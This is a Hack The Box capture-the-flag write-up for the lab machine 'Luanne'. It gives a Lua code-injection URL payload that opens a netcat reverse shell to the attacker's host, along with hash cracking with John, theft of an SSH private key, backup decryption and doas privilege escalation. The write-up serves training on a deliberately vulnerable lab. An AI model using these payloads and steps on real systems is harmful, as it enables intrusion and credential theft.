Hack The Box — Luanne — Write Up
Luanne is an easy difficulty NetBSD Linux machine. Network enumeration reveals a Medusa Supervisor Process Manager that is found to be using the default login credentials. Enumeration of a monitoring script that is accessible from the Supervisor Process Manager reveals a Lua script that is vulnerable to code injection. It is running in a custom weather web application on a bozohttpd server. A second misconfigured bozohttpd server that is found to be running in
development mode, which is leveraged to obtain the private SSH key for the system user r.michaels . Using netpgp , we can decrypt an encrypted tar backup file that contains the password for the user r.michaels , who is found to be able to execute commands as root, using the command doas .
Scanning and Enumeration
Nmap output reveals an SSH server and an Nginx server running on their default ports. A Medusa server is also running on port 9001. Navigating to both port 80 and port 9001 using a web browser returns an Authentication Required message.
However, Nmap recognized the Medusa server as a Supervisor process manager . Searching online for Medusa supervisor process manager default credentials reveals default username and password which is ‘user:123’.
Let’s try to login on port 9001 using the credentials:
It seems that Supervisor is monitoring some services on the host, using which we can execute some commands and get further information. Clicking on the Tail -f Stdout action of the service processes , returns real-time results regarding some processes that are being monitored on the host.
It is worth noting that two httpd processes are running, one on port 3001 and the other on port 3000.
Let’s go to the /weather/ directory which robots.txt informs us that the directory is been disallowed. Further enumeration revealed us its other directory /forecast.
From the output that we see, i can presume that city=list is a thing so let’s try to check the location
Gaining Access
Searching online for httpd Lua vulnerabilities reveals the following article as the first result. Scrolling down to the LUA CODE INJECTION , we can see some vulnerable examples for Nginx and CGI.
Firstly, we can start the nc listener so that we can retrieve the reverse shell connection back to us. We can now execute commands on the host as the user _httpd .
curl "http://10.10.10.218/weather/forecast?city=')+os.execute('rm+/tmp/pbf;mkfifo+/tmp/pbf;cat+/tmp/pbf|/bin/sh+-i+2>%261|nc+10.10.14.3+4444+>/tmp/pbf')+--"This is successful, and a reverse shell is returned.
Privilege Escalation
Enumeration of the filesystem reveals the file /var/www/.htpasswd .
Listing the content of the file, we see the following hash for the user webapi_user .
Let’s store the hash into a file called hash and attempt to crack it using John The Ripper.
echo "webapi_user:\$1\$vVoNCsOl\$lMtBS6GL2upDbR4Owhzyc0" > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
John reveals the password iamthebest for the user webapi_user . We can verify that these are the credentials for the authentication that is required to access the web page on port 80. It was successful but nothing was important there. So we search for other directories in the shell.
curl --user webapi_user:iamthebest localhost:3001/~r.michaels/id_rsa
Then, store the key in a file and name it id_rsa , give the appropriate permissions and connect to the host using SSH.
chmod 600 id_rsa
ssh -i id_rsa r.michaels@10.10.10.218
This is successful. The user flag is located in /home/r.michaels/user.txt .
Enumeration of the home directory reveals the file devel_backup-2020–09–16.tar.gz.enc . Judging by the file extension, this might be an encrypted tar file. Further enumeration reveals the files /home/r.michaels/.gnupg/pubring.gpg and /home/r.michaels/.gnupg/secring.gpg . Typing gpg on the host system returns the error not found . Executing the command uname -a reveals that the host OS is NetBSD.
Let’s search online for the NetBSD implementation of the GnuPG.
It is very likely that the two files we found earlier in the directory /home/r.michaels/.gnupg/ , have been used for encrypting the tar file we also found in the /home/r.michaels/backups/ directory. Let’s try to decrypt the tar file by issuing the following command.
cd /home/r.michaels/backups
netpgp --decrypt --output=devel_backup-2020-09-16.tar.gz devel_backup-2020-09-16.tar.gz.encLet’s copy the tar file into the /tmp directory and try again.
cp /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc /tmp
cd /tmp
netpgp --decrypt --output=devel_backup-2020-09-16.tar.gz devel_backup-2020-09-
16.tar.gz.enc
The decryption was successful. The netpgp tool appears to automatically use the keys that were stored in the directory /home/r.michaels/.gnupg/ . Finally, let’s decompress the tar file we just decrypted.
tar xvzf devel_backup-2020-09-16.tar.gz
Enumeration of the file /tmp/devel-2020–09–16/www/.htpasswd , reveals the hash $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu. for the user webapi_user .
Let’s crack it using John and check if the password is different from the one we found earlier for the same user. First, we have to add the hash into a file and name it hash . To do so, we execute the following commands locally. Then, we run john .
echo "webapi_user:\$1\$6xc7I/LW\$WuSQCS6n3yXsjPMSmwHDu." > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
This is successful. The password littlebear is revealed for the user webapi_user . Let’s further enumerate the system, by uploading LinPEAS script. First, we download it locally. Finally, on the host, we give the file execution permissions and run it.
chmod +x linpeas.sh
sh linpeas.shLinPEAS reveals that the doas.conf file, contains the configuration permit r.mechaels as root . The doas command is the sudo alternative for the
OpenBSD OS. That means the we can execute commands in the context of root, as long as we know the password. Let’s run the following command in order to get shell as user root, providing the password littlebear we found earlier.
doas sh
We did it…. We are root now….
The root flag is located in /root/root.txt .
Visit My Hack The Box Profile —
https://app.hackthebox.eu/profile/464208
For any queries contact on my twitter and linkedin profiles -
